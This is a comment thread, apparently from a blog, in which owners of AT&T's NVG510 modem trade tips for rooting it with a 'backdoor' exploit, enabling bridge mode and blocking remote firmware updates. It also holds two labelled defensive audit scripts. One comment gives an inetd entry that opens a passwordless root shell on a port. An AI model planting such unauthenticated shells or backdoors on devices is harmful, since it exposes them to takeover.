Hmm, never heard of the NVG589. Must be a new, but similar modem. Yea, cwmp probably won't help much, especially since it's such a pain to access. I guess I'll have to start trolling the dslreports forums more. I didn't know there were discussions like this there. 
10/31/2013 2:06:53 PM
McBill
Pretty crummy of AT&T to disable access to all those modems without fixing the reason we need access to the stupid things!

I have firmware version 9.0.6h0d48 on my modem, and through a massive amount of fooling around, I got my modem working with DSL service from Qwest/CenturyLink.

Before I got it working with Qwest DSL, I was looking through the dump and found this:
ip.dynamic-dns.enable          = on
ip.dynamic-dns.service-type    = dyndns

I'm a hardware engineer, not a software engineer, but I think this might be AT&T's back door into the modem.  dyndns is a remote access service.  See http://dyn.com/remote-access/

I turned it off.  I'm not sure if my modem didn't upgrade itself because I made this change before the evil upgrade came out, or if it is because I am not on the AT&T network.
11/1/2013 5:11:58 AM
Earlz
dyndns is just something so you can point to your modem on the internet as `foobar.dyndns.com` instead of `64.123.45.12` or some such. The reason it didn't update for you is because you're not on AT&T's network and therefore, a value isn't set for the CWMP stuff. CWMP is how they do remote control and remote updates. 

Also, please do not post links to private servers. Yes, I know they exist, but I don't want to be advocating that people go to them here. They contain confidential documents, even if they are publicly accessible. Any comments with links to them will be deleted
11/1/2013 1:53:56 PM
Ralph
Wow. I guess it's time to buy a new modem just in case. Besides, Google's dns timing out is a pain. I won't be getting a Motorola again for sure. Luckily, I still have google's public dns in my modem. I tried to change my secondary dns entry and it didn't work. The only thing that worked for me is to change the dns entries to fix the thing. I sure won't be doing a factory reset.
11/3/2013 12:44:31 PM
Earlz
Ralph and future viewers. I have a new root exploit on the NVG510 that should also work on a few other things running Netopia OS (NVG589 and some kind of modem in Switzerland). I'm still testing it though to ensure that it's safe because it's marginally less safe. If you want to wait for just a few more days I'll have it published. I just want to ensure it's not going to brick or permanently break your modem 
11/3/2013 4:30:42 PM
Ralph
Nice. Thank you.
11/4/2013 1:55:05 AM
ThaCrip
i also noticed on a recent reset of my modem earlier today that i get the same error as listed above with the "Message Format Error" and that the usual exploit does not work. i am in Michigan on AT&T U-Verse with the NVG510 modem.

but it's nice to see Earlz got a work around coming in the near future and that it's permanent which is a huge plus ;)

p.s. so far in the 4-5 hours i been using my AT&T U-Verse internet after reset of modem it's not acted up with the extremely annoying connection problem alert which completely ruins your internet experience as everyone in here already knows.
11/6/2013 1:42:28 AM
Earlz
I'm hoping that they've improved that at least, so that it doesn't happen as often. And with the latest firmware, they removed the "filter check" which caused this problem at times as well. But I've still been getting reports of it happening
11/6/2013 2:56:14 PM
contact420
My NVG510 was replaced by the Uverse guy yesterday, and its not running 9.0.6h2d30 yet. Is there a way to disable the firmware update through rooting?
11/8/2013 2:09:06 AM
Earlz
@contact, I already have the page updated :) Just use the new exploit, it'll survive firmware updates and factory resets
11/8/2013 2:52:42 AM
contact420
@Earlz Thank you so much!!! 
11/8/2013 5:02:43 AM
Anonymous
Thanks for the update Earlz ;) (and knowing this is permanent is a big plus)

side note: i was running 'NVG510 9.0.6h2d30' for a couple of days or so now before i installed this new exploit and i did not have any issues with that annoying connection problem alert which makes me think AT&T did fix some stuff (like you mentioned?) in their modem to where if it does come up it must be much less common i would assume.

either way, i installed this hack as a bit of a insurance plan. plus, it's nice to have the router doing the PPP stuff as now my router shows my actual IP address for the WAN instead of the NVG510's internal network IP of the usual 192.168.x.x variations.
11/8/2013 9:13:51 AM
Brock
How do I know if it worked? Here's what happened:
Checked for backdoor install on port 28 - did not appear to be installed. Proceeded with install
Visited update.ha page
Found nonce on page!
Authentication required. Attempted to login to web interface.
Found nonce on page!
Modem firmware appeared as '9.0.6h2d30'
Sent backdoor install script
Got response after backdoor install failed. It's probably still ok, continuing..
Rebooting modem - Waiting 2 minutes
Backdoor install accessible at port 28 is sucessful! - Logged in as admin...
Assertion Failure: nsh shell does not appear to be working... or something
Attempting to continue despite possible error
Sending set link[1].port-vlan.ports "lan-2 lan-3 lan-4 ssid-1 ssid-2 ssid-3 ssid-4"
Sending set link[2].port-vlan.ports "lan-1"
Assertion failure: validation did not appear to be successful
Attempting to continue despite possible error - Changes Saved - Done!
So... What just happened here?
11/8/2013 4:47:12 PM
Anonymous
@ Brock... i would reset your modem and then get back into the modem and make sure you are at the correct prompt before doing anything...

if your prompt looks like this... "NOS/XXX>" those commands you entered won't work as if your prompt looks like that you need to make sure it looks like this "Axis/1234565678>" before you can do the 'set link[1] etc etc' stuff. so basically... if you are at that "NOS/XXX" type of prompt you need to type in the following... "!" (without the " and hit enter) and then type in "nsh" (without the " and hit enter) then you should be at that Axis prompt. then after you are there you can type in your commands (i.e. set link[1] etc) and then after that's done do the whole 'validate' 'apply' 'save' commands in that order. then after that's done, reboot the router and all should be good. but you won't be able to run the 'save' command unless your ethernet line is connected on ports 2/3/4 since port 1 will act as PPP now (if you did these commands using Port 1 on the NVG510 i just
11/8/2013 5:50:13 PM
Anonymous
to add to my above post to Brock...

if you did these commands using Port 1 on the NVG510 i just... remove ethernet from port 1 and plug it into port 2 (or 3 or 4) and log back into the router, get to Axis prompt, and run the 'save' command and then reboot the router and all should be good. just make sure the 'save' takes effect before rebooting though and you should be fine.
11/8/2013 5:56:01 PM
Earlz
@Anon, he's talking about the NVG510 Fixer app, which makes things quite a bit easier. but he might be right @Brock. Is your android device connected to the NVG510's wifi, or another wifi AP? Make sure that your other wifi access point is plugged into the NVG510 via an ethernet port other than port 1
11/8/2013 6:19:38 PM
Earlz
If that isn't the problem, please email me at earlz -AT- earlz dot net
11/8/2013 6:20:36 PM
Brock
I'm actually doing this over wifi with the NVG510 Fixer via my Android phone. I did a factory reset of the Uverse router and completed the Bridge Mode - looks like it worked this time. Thanks Anon!
11/8/2013 7:08:32 PM
ThaCrip
actually those three Anonymous posts below the 'ThaCrip' name are me as i just forgot to change the Anonymous to ThaCrip before i posted.

but anyways... i thought that might be the issue for Brock as i remember when i first did the previous exploit prior to the current one about a month ago that i simply missed that small but important step and i was wondering why it was not working and then started from the beginning and was reading the instructions a bit more carefully and noticed i missed that small step which is a show stopper if it's not on the Axis screen as i could see some people missing that step if they don't read carefully.

but glad you got it fixed though Brock and thanks again to Earlz for the permanent solution as it will be nice to still be able to configure the router to basically act as PPP mode etc even after factory reset or if AT&T forces a firmware upgrade on us and blocks the current exploit again in the future. but like i was saying given my time using it without the exploit insta
11/8/2013 8:55:11 PM
Brock
Thanks for your time guys - It still didn't solve my problem trying to setup a VPN... *sigh* What a pain, but I don't guess it's the modem's fault!
11/8/2013 10:00:17 PM
Ralph
Thanks! It worked for me! I just used putty and used the 192.168.1.254 ip and changed ssh to telnet and changed the port 28. Thank you so much! You rock! It worked for my NVG510.
11/8/2013 10:42:38 PM
ThaCrip
@ Brock ; from what it shows in the topic it appears when the PPP is setup it's a straight feed from AT&T servers directly to whatever you got connected to port 1 which is going to be the router. so it's like the NVG510's firewall etc is not even there i believe as it don't seem to be interfering with open ports on my torrent program which i already have properly forwarded on my main network.

@ Ralph ; i used Putty myself too as the exploit only seems to work if the NVG510 is on that 192.168.1.254 address since i imagine that's where the web page is programmed to access. so i just connected the NVG510 to my PC's ethernet port directly and got the exploit up and running and then changed the NVG510's IP to 192.168.0.1 since my main router (running DD-WRT) is 192.168.1.1 and then i can access the NVG510 configuration through the router now as long as the ethernet cable from the router's WAN port is plugged into ports 2/3/4 on the NVG510.
11/9/2013 12:04:15 AM
Earlz
Yea, it's possible for the exploit to work as different IP addresses, but I just haven't bothered. If you want to have it work on a different IP you can save the control2.html page to your computer, open it up in notepad, and replace all of the "192.168.1.254"s with whatever IP you intend to target
11/9/2013 12:46:21 AM
Ralph
Remember to do: set mgmt.lan-redirect.enable on and set mgmt.upnp.enable on if you are using magic
!
nsh
11/10/2013 3:23:52 AM
Ralph
I mean: mgmt.lan-redirect.enable off
11/10/2013 3:24:57 AM
Ralph
set mgmt.lan-redirect.enable off
11/10/2013 3:25:28 AM
ThaCrip
@Ralph ; i did the "set mgmt.lan-redirect.enable off" and the whole changing port 1 (i.e. set link[1] and link[2] etc) to act like a bridge mode so that the NVG510 just passes the internet connection from AT&T servers through the NVG510 directly (on Port 1) to my main router's WAN port so that can handle the connection/traffic.

i never bothered with the UPNP command as i don't think it's really needed but primarily the commands above seem to be what this exploit is worth installing for.
11/10/2013 6:10:40 AM
Ralph
I think that upnp is really for gaming which I can't do since my internet is 768k Basic.
11/10/2013 11:29:05 PM
ThaCrip
that's the thing... even if UPNP is, i think the direct connection to AT&T servers (with the whole set link[1] and set link[2] etc) bypasses all of the port/firewall etc stuff on the NVG510 modem to where your router that you got connected to the NVG510 takes care of it so if that's setup correctly with port forwarding etc then the NVG510 don't need any changes. because if that's truly a 'bridge mode' (which apparently it is according to Earlz) then what i said should be correct.

side note: even with a 768k connection you should be able to play games online just as long as no one else is using your internet line during your gaming as that's the way mine was as i had 40KB/s (i.e. 384kbps) DSL connection at one point in the past (now it's 175KB/s (maybe 180-200KB/s at best)) and it worked fine as long as no one was using the line while i was playing otherwise pings go out the window.
11/11/2013 3:26:43 AM
Ralf
I fixed up mine as well and enabled UPNP as well and it works. Turned off redirect and enabled bridge. Works fantastic.
However something broke during the firmware upgrade prior to that because my upload speeds dropped to 1/3. Dug out the old 2210-02 and uploads are normal.

NVG510 retired!
11/11/2013 3:44:34 AM
Ralf
My NVG510 must be broke or they did that on purpose. I have 18 meg down and 1 meg up. But for some reason AT&T doesn't offer that anymore around here. They only offer 12 meg now for new customers. I still have my 18 though.
11/11/2013 3:51:15 AM
Ralf
I have a feeling though that there could be another update soon, because they also disabled IPv6. At some point it will get re-enabled again. I would just like to know how important IPv6 is so far.
11/11/2013 3:10:20 PM
Earlz
Yea, I was actually considering hoarding the exploit and not releasing it so that they couldn't put in a security update when they reenable IPv6.. but meh. I'm getting a few worrying reports that the NVG589 (very similar to NVG510) has this latest exploit patched in some version of its firmware already.. ugh. If you're on U-Verse with this modem, I have one recommendation for the future: Use a different ISP, one that allows you to truly bridge past the modem. 
11/11/2013 4:41:05 PM
ThaCrip
@ Earlz ; i would have assumed this recent exploit would not be patched for at least a few months given they seem to slack off in general. but apparently when it comes to screwing over their customers they prefer to patch stuff quickly but when it comes to helping them they just leave their firmware faulty as hell for months as i can't believe they would release those NVG510 modems to the general public a while ago when they had those connection problem warning screens (which should have never been there in the first place) as that completely ruins your internet experience since you almost spend more time messing with that than actually using the internet and i can guarantee that will upset a ton of average users as their basic internet won't even function reliably for long before that comes up and then you got to clear browser cache etc and pray it holds out which the average user will most likely end up calling AT&T's tech support 24/7. but as long as they fixed that and the internet is at least useable (an
11/11/2013 10:37:11 PM
ThaCrip
continuation to my above post...

at least useable (and it appears they did (or mostly did)) then it's pretty much good enough for most users.

either way, at least i got this recent exploit (which is supposedly permanent?) installed before they patch anything as even if their stock NVG510 modems work now i prefer to have my router do the WAN communication to bypass any BS on the NVG510's side of things.

so thanks again for releasing this exploit, those of us who can install it appreciate it ;)
11/11/2013 10:39:35 PM
Ralph
Unfortunately, the only other option I have is satellite internet which has very low caps and is very expensive. Thanks for releasing the exploit!
11/12/2013 4:34:15 AM
Ralph
Also, I didn't bridge my modem. I just change the settings so that my Internet works. Thanks.
11/12/2013 4:36:07 AM
Qwerty
Ralph @ 11/8/2013 10:42:38 PM

You are saying you got SSH working? How did you get it to work exactly?
I'm not familiar with this stuff but could you establish an SSH tunnel for web browsing?

Here is what happens when I try to set the port.

Axis/SERIALNUMBER> set mgmt.shell.ssh-port 22
set: Permission denied
11/15/2013 9:02:47 PM
Qwerty
set mgmt.remoteaccess[4].port 22
validate
save

The above commands went through but didn't appear to open a port.
Used putty with IP 192.168.1.254 PORT 22. Also used a website to check if an external port was open on port 22 but it failed to confirm that port 22 was open.
11/15/2013 9:13:58 PM
Qwerty
NOS/SERIALNUMBER> remote-access start ssh
Started remote access for ssh

NOS/SERIALNUMBER> remote-access status ssh
ssh remote access: enabled      number of active clients: 0

Tested the port on WAN side and LAN side. I'm out of ideas.
11/15/2013 9:25:09 PM
Earlz
I remember SSH worked in previous versions of the NVG510 firmware. I'll test it out tonight and see if I can coax it into working. Also, ensure that your modem isn't bridged. 
11/15/2013 9:36:09 PM
Dr Frag
Hey guys, what about this command?  set conn[2].dhcpc.dns-enable off
I set that, then configured Google DNS addresses and restarted the NVG510.  The DNS addresses on the Broadband Status page still show 8.8.8.8, 8.8.4.4
FYI, I'm using Passthrough/Manual mode as well as redirect disabled, "TrueBridgeMode", DHCPS off, all firewall off, with a 12x1 Mb connection.
Although my static IP is not working but that may be because this laptop is connected to port 2 and I will have to wait till after hours to enable the connection on our Netgear ProSafe router on port 1.

DF
11/16/2013 1:05:06 AM
Ralph
No. I didn't get ssh to work unfortunately.
11/16/2013 8:13:38 AM
Ralph
Well, I edited the numbers in /etc/resolv.dnsmasq completely to a non-AT&T dns.

set ip.dns.primary-address   208.67.220.220
set ip.dns.secondary-address 208.67.222.222
set ip.dns.ext-address1 8.8.8.8
set ip.dns.ext-address2 8.8.4.4

Turned Power Save Off.
set phy.dsl.power-save.enable off
Used these other commands:
set mgmt.cwmp.enable off
set ip.dns.domain-name resolver1.opendns.com
set ip.dns.proxy-enable on
set ip.dns.override-allowed on
set ip6.enable off
Turned QOS Off since you can't set it in the Modem/Router:
set phy.dsl.atm.vc[8].qos-enable off
set phy.ensw.qos-mode off
11/16/2013 8:43:33 AM
Ralph
I also set the MTU to 1492 since it's better for the dsl without PPOE.
11/16/2013 8:44:45 AM
Ralph
Change:
set ip.dns.override-allowed off because it will overwrite the dns if not.

Don't do:
set phy.dsl.atm.vc[8].qos-enable off
set phy.ensw.qos-mode off

If you mess up, do a factory reset. If it still doesn't work, it's probably a line issue.
11/16/2013 10:52:26 AM
Ralph
Enable Allow Override first, Edit the 4 dns addresses, then Disable Allow Override.
11/16/2013 10:57:19 AM
Ralph
I wouldn't disable qos because I don't know if it's for at&t or yourself. Also, I had four dns  entries in /etc/resolv.dnsmasq two of them at&t causing problems. I have heard power saving causes issues for some too and an article somebody was having dns issues related to mgmt.cwmp.enable which is related to set mgmt.cwmp.periodic-inform.enable off which disables firmware updates if you add that too.
11/16/2013 11:05:54 AM
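Added example (not part of any comment above, and not the blog author's or the vendor's code): a small Python audit that reads a pasted config dump or a transcript of `set` commands, works out the final value of each key, and reports which of the management-plane settings discussed in this thread are switched on. The key names come from the comments; the sample input is constructed, and treating port 0 as "disabled" is an assumption taken from Pedro's unanswered question.

```python
import re

# Two line shapes seen in this thread: the dump form "key = value" and the
# command form "set key value", optionally preceded by a shell prompt.
KEY = r"[A-Za-z0-9_.\-\[\]]+"
DUMP_RE = re.compile(r"^\s*(" + KEY + r")\s*=\s*(.*?)\s*$")
SET_RE = re.compile(r"^\s*(?:\S+>\s*)?set\s+(" + KEY + r")\s+(.*?)\s*$")


def port_set(value):
    # Assumption: a numeric, non-zero port means the listener is configured.
    return value.isdigit() and int(value) != 0


def is_on(value):
    return value.lower() == "on"


# (key pattern, predicate, note). Notes are this example's wording.
CHECKS = [
    (r"mgmt\.shell\.telnet-port", port_set, "telnet shell configured (cleartext login)"),
    (r"mgmt\.shell\.ssh-port", port_set, "ssh shell configured"),
    (r"mgmt\.remoteaccess\[\d+\]\.port", port_set, "remote-access port configured"),
    (r"mgmt\.cwmp\.enable", is_on, "CWMP remote management and updates enabled"),
    (r"mgmt\.upnp\.enable", is_on, "UPnP enabled: LAN hosts can request port mappings"),
    (r"ip\.dynamic-dns\.enable", is_on, "dynamic DNS publishes the WAN address under a hostname"),
]


def effective_settings(text):
    """Return {key: final value}. The last assignment wins, and a `set`
    that is immediately followed by a "set: ..." error line is rolled back.
    This reflects what was typed, not whether validate/apply/save ran."""
    settings = {}
    undo = None  # (key, previous value or None) for the most recent `set`
    for line in text.splitlines():
        if line.strip().startswith("set:") and undo is not None:
            key, previous = undo
            if previous is None:
                settings.pop(key, None)
            else:
                settings[key] = previous
            undo = None
            continue
        match = SET_RE.match(line)
        if match:
            key, value = match.group(1), match.group(2).strip('"')
            undo = (key, settings.get(key))
            settings[key] = value
            continue
        undo = None
        match = DUMP_RE.match(line)
        if match:
            settings[match.group(1)] = match.group(2).strip('"')
    return settings


def audit(text):
    """Return a sorted list of (key, value, note) for enabled management features."""
    findings = []
    for key, value in sorted(effective_settings(text).items()):
        for pattern, predicate, note in CHECKS:
            if re.fullmatch(pattern, key) and predicate(value):
                findings.append((key, value, note))
    return findings


# Constructed sample: a few dump lines followed by a typed session.
SAMPLE = """\
ip.dynamic-dns.enable          = on
ip.dynamic-dns.service-type    = dyndns
mgmt.cwmp.enable               = on
set mgmt.shell.telnet-port 23
Axis/SERIALNUMBER> set mgmt.shell.ssh-port 22
set: Permission denied
set mgmt.upnp.enable on
set mgmt.upnp.enable off
set link[2].port-vlan.ports "vc-1 lan-1"
set mgmt.remoteaccess[4].port 22
validate
save
"""

if __name__ == "__main__":
    for key, value, note in audit(SAMPLE):
        print(f"{key} = {value}: {note}")
```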
Att tech
KISS get yourself a 3rd party router from anywhere(any other router is better than the one in the nvg510) and go to firewall(192.168.1.254) copy the MAC address from device list set for specific MAC address.  Let the cheap router take over and you will have very little trouble. Google nvg510 3rd party router instructions
11/16/2013 7:06:50 PM
Att tech 2
Just FYI nvg510 is not Vdsl. It is an adsl modem which is basically dsl, the only difference is when they switched dsl to uverse they now stream the signal ip, so it is capable of higher speeds than regular dsl. I agree the nvg510 is a crap modem and thank you for the android app it helps a lot in the field. Also the nvg589 is a bonded pair Vdsl modem, it is actually a way better modem than the 510, it has an n wireless router not the crappy g. Vdsl modems are for fiber to the neighborhood and also work for fiber to the premise. The 510 still gets its signal from the central office. Hope this clarifies a little and thanks again for the override app for ip diagnostic redirect page.
11/16/2013 8:28:06 PM
Earlz
I also recommend a third party router. Note though that the bridging solution built into the NVG510 isn't a true bridge. You can still overflow its NAT tables etc, and I personally had problems where the NVG510 would randomly forget that traffic should go to the router until I rebooted it every week or so
11/17/2013 4:32:19 AM
usna1970
Ran control2 page with nonce string and restarted router. No luck getting telnet to connect to the router. o 192.168.1.254 [28] 
 Any ideas?
11/21/2013 6:00:22 AM
Earlz
What did the router say afterwards, what firmware version is on your modem, and are you using an NVG510? 
11/21/2013 2:55:21 PM
usna1970
Router is NVG510 firmware 9.0.6h2d30. Reset router to Default factory settings and tried again. When I run the sh with the nonce value it activates the command and returns me to the router update page. The router update page says "Firmware image is invalid" in Red font. After I restart the router and try to telnet I get the telnet message cannot connect to 192.168.1.254 on port 28. Any idea what I'm doing wrong? Do I need to do anything with my ie settings for telnet to interface correctly? I'm allowing all popups and cookies.
11/22/2013 6:15:39 PM
usna1970
Finally got to Telnet login and password. After entering password I get "Axis/62035362922576". Any idea what's going on?
11/22/2013 6:43:07 PM
ThaCrip
@ usna1970 ; yeah, that's the screen you want it to get to is that 'Axis/xxxxxx' screen. after you are there you should be able to type in the commands you want which is explained in the topic. just follow the stuff carefully and you will be fine.

just remember the 'validate' / 'apply' / 'save' commands after you do all of the 'set etc etc' stuff and if you are going to use the bridge mode it's best to make sure you are connected to either ports 2/3/4 before doing that command otherwise you won't be able to do the 'save' command without reconnecting the ethernet cable to port 2/3/4 of the router etc.
11/22/2013 8:50:23 PM
pavale
Need help!

I rooted my NVG510 more than 1 year ago, and it always worked well.

But this morning, I noticed it got rebooted, seems like rebooted by AT&T, and I can still telnet to the shell, but I can't enter the bash shell or nsh anymore. Can anyone help? Thank you very much.


login: admin
Password:

Terminal shell v1.0
Copyright (C) 2011 Motorola, Inc.  All rights reserved.
Motorola Netopia Model NVG510 Wireless-N ADSL AnnexA Ethernet Switch
Running Netopia SOC OS version 9.0.6 (build h2d30)
ADSL capable
(admin completed login: Admin account with read/write access.)

NOS/SERIALNO> magic

Warning: Accessing these commands is restricted, and will affect normal
operation of this device. Exit now if you entered by mistake.
NOS/SERIALNO/DEBUG/MAGIC> !
Unrecognized command. Try "help".
NOS/SERIALNO/DEBUG/MAGIC> exit
NOS/SERIALNO/DEBUG> exit
NOS/SERIALNO> nsh
You are not authorized to perform this function.
NOS/SERIALNO>
11/22/2013 9:29:28 PM
Anonymous
@pavale  same issue here.  Can't get past ! command.
11/22/2013 10:50:03 PM
chipchoco
Same here.
Do you have a suspicious reboot on the router? Hmm, who did that and why do they want to reboot my router......
11/22/2013 11:19:52 PM
Ralph
Did you guys try the new root method? The old one no longer works.
11/23/2013 12:25:22 AM
ThaCrip
@ pavale ; like said above the old method does not work anymore. so use the new method. also, check to make sure you got the same firmware that the topic says works with this new hack.

also, i noticed it says "NOS/xxxxx" as you need to be on the "Axis/xxxxx" screen in order to get commands to work. read the instructions carefully as it shows you how to get to the Axis screen.
11/23/2013 1:04:34 AM
Earlz
@pavale yes they patched the shell so that you can no longer reach a root shell from it. Follow the instructions here for the new exploit to get to root shell again.
11/23/2013 1:26:03 AM
chipchoco
I own the NVG510 device, who gave them the right to upgrade firmware on my device at midnight while I'm sleeping?

They can say something like if you don't upgrade the firmware AT&T will stop providing services. 

But how can they upgrade firmware on my device and reboot it?

Does anyone have any idea how to stop them doing this, either in a technical way or a social engineering way?

Thanks.
11/23/2013 2:23:08 AM
Anonymous
my NVG510 is 172.16.0.1  Do I need to change it back to 192.168.1.254 for this to work?
11/23/2013 3:32:41 AM
Anonymous
got it.  downloaded the complete control 2.html and edited o 172.16.0.1
11/23/2013 3:52:11 AM
DustinDwayne
Does anyone know what mgmt.shell.unlock is for?
11/23/2013 3:54:55 AM
Earlz
I have not seen that option before. It must be new in the last firmware update. My only recommendation is to try it and see what it does :) 
11/24/2013 5:00:36 AM
Anonymous
I've got ssh working fine and I'd like to be able to use scp to copy files to/from the device. Unfortunately, scp does not know to send "magic" and "!" after authenticating and it is not expecting the output from the nvg510's cshell. Does anyone know how to make scp work? I tried creating another user, admin2 with /bin/ash as its shell but that also failed to work.
11/26/2013 3:49:04 PM
Earlz
I don't think scp will work because the version of SSH included is extremely minimal. You might try doing a permutation of my recent backdoor script to activate SSH (note, disable SSH before doing this)

echo 29ssh stream tcp nowait root /usr/sbin/telnetd -i -l /bin/ash > /var/etc/inetd.d/ssh29
pfs -a /var/etc/inetd.d/ssh29
pfs -s

and then reboot. Then connect to ssh on port 29. Again, no idea if this will work, but maybe worth a try? 
11/26/2013 6:51:39 PM
Earlz
er, not /usr/sbin/telnetd.. use /usr/sbin/dropbear or some such
11/26/2013 6:52:10 PM
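A defensive counterpart to the inetd entry in the two comments above, added here as an example and not part of the original thread: a POSIX sh/awk audit that flags inetd-style lines where telnetd is started with `-l` pointing at a shell, which skips the login prompt. The classic inetd field order and the two contrast lines in the sample are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread): audit inetd-style service entries for
# listeners that give a shell to whoever connects.
# Assumed field layout (classic inetd): name type proto wait user program [args...]

# Constructed sample input. The first entry is the one quoted in the comment
# above; the other two entries are constructed for contrast.
sample_entries() {
    cat <<'EOF'
29ssh stream tcp nowait root /usr/sbin/telnetd -i -l /bin/ash
# constructed: telnetd that still runs the normal login program
23telnet stream tcp nowait root /usr/sbin/telnetd -i
# constructed: SSH daemon started from inetd
22ssh stream tcp nowait root /usr/sbin/dropbear -i
EOF
}

# audit_inetd: read inetd-style lines on stdin and print one line per finding.
#   FLAG = telnetd whose login program (-l) is a shell, so no password is asked
#   WARN = telnetd with the normal login program (still cleartext)
audit_inetd() {
    awk '
    /^[ \t]*#/ || NF < 6 { next }      # skip comments and incomplete entries
    {
        name = $1; user = $5

        # basename of the server program
        n = split($6, parts, "/"); base = parts[n]
        if (base != "telnetd") next

        # find the argument that follows -l, if any
        login = ""
        for (i = 7; i < NF; i++)
            if ($i == "-l") login = $(i + 1)

        # basename of the login program
        m = split(login, lp, "/"); lbase = lp[m]

        if (lbase == "sh" || lbase == "ash" || lbase == "bash")
            printf "FLAG %s: telnetd runs %s as %s with no login prompt\n", name, login, user
        else
            printf "WARN %s: cleartext telnet service as %s\n", name, user
    }'
}

sample_entries | audit_inetd
```

On a device, the same function can be fed the files in the inetd configuration directory instead of the sample, for example `cat /var/etc/inetd.d/* | audit_inetd`, using the path that appears in the comment above.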
Anonymous
Can I use this modem for Comcast internet? I switched from U-verse ATT to Comcast and was wondering if I can just connect it or I need a new wireless modem/router
11/29/2013 4:45:28 PM
ThaCrip
@ Anonymous ; Comcast uses a cable connection and AT&T use a DSL connection (i.e. different type of physical connection to the modem itself).

so no, you won't be able to use this modem with Comcast.
11/30/2013 9:49:14 PM
MrH
My 510 started flashing all 8 LEDs red last week. I have never done any hacks to it but wonder if it would be possible to do so now. ATT are sending another unit to replace for $100 fee.
Is this unit completely bricked?
12/3/2013 7:05:03 PM
WannaCompile
I'm trying to build a toolchain to do some cross-compiling. I'm following the instructions on sourceforge not having success. Can someone who has successfully built the toolchain give some pointers? Thanks.

@MrH I'd start right away with hacking it.
12/4/2013 1:25:51 AM
Earlz
@MrH sorry I have no idea. If you can get to the web interface, it may be possible to rescue by reinstalling the firmware.. but if it's blinking red, that usually means it's bricked

@WannaCompile I've also tried to do this, but it uses an old version of everything that has bitrotted enough that I couldn't get it to compile on my modern Arch Linux box. I believe they provide a precompiled toolchain somewhere as well. 
12/4/2013 1:48:08 AM
WannaCompile
I changed the config to use version 2.19 instead of 2.18 of binutils and finally got past that part and now I'm getting a "mixed implicit and normal rules" error in the section "Installing C library headers / start files".
12/4/2013 2:07:26 AM
Anonymous
By putting the modem device IP on the same subnet as the router, and disabling modem DHCP, then connect a cable from the router LAN port to the modem LAN port [2,3, or 4], you can access the modem config page in bridge mode, that is when router WAN port is connected to the modem LAN-1 port.
12/12/2013 1:58:47 AM
Anonymous
A member on DSL report said there is a more elegant solution to access modem in bridge mode with a single cable, however that involves VLAN and trunking. I have not upgraded my router to support VLAN yet.
12/12/2013 2:00:36 AM
Anonymous
so how do I stop att from performing remote upgrades on my nvg510 firmware and screwing everything up? thought I read this somewhere
12/12/2013 9:35:00 AM
Jerry
I could be wrong, however I read if you use true bridge mode, ATT would not be able to upgrade the firmware, as the software on the modem has no internet access.
12/12/2013 5:58:50 PM
Earlz
@Anons for VLAN, I've not messed with it. I think it's possible, but might require a switch capable of handling VLANs. If you get something to work, you could email me though and I could post it here to help others

@Jerry/anon, I'm pretty sure that this is the case. It's also possible to firewall off the management port they use for updates, but I've not tried to do this
12/12/2013 6:32:22 PM
mateor
I saw the comments that there was a possible firmware upgrade that could patch an exploit used to get root- but I am still going to try this. Thanks for the write-up!
12/20/2013 2:48:35 AM
Ronaldwal
My name is Ronald. Am new here. Am getting a lot of help from this forum.
12/26/2013 9:20:11 PM
martin
Hey Earlz
i tried your pages but no success here is the modem info and output from the "Save" button action (one requiring nonce value)

NVG510 INFO
System Information

Manufacturer	Motorola
Model Number	NVG510
Serial Number	62035353750944
Software Version	9.0.6h2d21
MAC Address	38:6b:bb:39:4d:a1
First Use Date	Used - Time Pending
Time Since Last Reboot	00:00:25:09
Datapump Version	A2pD035b.d23i
Legal Disclaimer	Licenses


SCRIPT OUTPUT
    0K                                                           1.09 MB/s

00:27:10 (1.09 MB/s) - `/tmp/backdoor.sh' saved [184]
sh: /tmp/backdoor.sh: line 1: HTTP/1.0: not found
sh: /tmp/backdoor.sh: line 2: Location:: not found
sh: /tmp/backdoor.sh: line 3: Pragma:: not found
sh: /tmp/backdoor.sh: line 4: Content-Type:: not found
sh: /tmp/backdoor.sh: line 5: : not found
sh: /tmp/backdoor.sh: line 6: syntax error: unexpected redirection
HTTP/1.0 302 Found
Location: /cgi-bin/update.ha
Pragma: no-cache
Content-Type: text/html
<html><meta h
1/6/2014 12:51:45 AM
Earlz
@martin it's possible you may be stuck in the redirect loop thing. Ensure that when you visit a page in your web browser you don't get the "possible connection issue found" page. If so, click continue so that your web browser shows you the actual page you're visiting. 

Afterwards, retry the instructions for the backdoor
1/6/2014 2:37:29 PM
Baylink
Just to confirm: once the modem's been put in bridge mode, ports 2-4 and WLAN can reach the modem's command interface, but nothing else, and port 1 is in "real" Bridge Mode to the WLAN, and can't see the rest, is that correct?  So once I enable bridge mode, the only way to manage the modem is via the app and WLAN, or telnet *from a local PC on ports 2-4*?
1/7/2014 4:43:44 PM
Earlz
Yes, that is correct @Baylink. 
1/7/2014 4:55:20 PM
Anonymous
Ok, well my friend who's stuck with the thing can get out to the net through the wifi, so bridge can't be on; telnet says it's already on, but I can't telnet to :28, and the public address doesn't appear to be CGN; 172.11/16 is a publicly routed address, right? 
1/7/2014 4:57:27 PM
Baylink
Yup, looks like:

http://dnstree.com/172/11/50/

(Cool site, BTW.)

Well, it looks like we may be SOL.  She's not equipped to handle the telnet session, I don't think, and I can't get to it.  <pout>  :-)
1/7/2014 4:59:30 PM
Earlz
yea, the port 28 telnet will only be accessible from within the LAN. Although, if it's bridged, you shouldn't be able to access the internet through wifi. 
Hope it all resolves :) 
1/7/2014 6:03:15 PM
Anonymous
Hey earlz, thanks for the instructions. I just got DSL service and an NVG510 and am trying to enable bridge mode to use my own router. I successfully used the exploit to install the telnet client, but when I login to the router that's when things go weird.

I connect to the IP and I'm asked for the login and password, but then I get immediately dumped to the "Axis/#######>" shell prompt. I don't get the whole info block after logging in like your example. I input the "magic" command and I get an output saying (poof!)

I tried using the "set" command to change the link parms, and I get "set: Another client has the SDB write lock". Any idea how to remove that?

My modem came with the 9.0.6h2d30 fw. Any ideas what might be going on here?
1/8/2014 12:08:06 AM
Anonymous
I posted the previous Anonymous comment... I got it figured out and now my router is handling the actual routing, like it should be! Thanks Earlz!
1/8/2014 12:26:31 AM
martin
@earlz
yup, the modem works fine, browsing works fine.
1/13/2014 4:34:31 PM
Anonymous
Thread with a 589 fw link; looks like the real deal. Can that help?

http://www.dslreports.com/forum/r28948370-Help-with-eBay-NVG589
1/13/2014 7:01:45 PM
Earlz
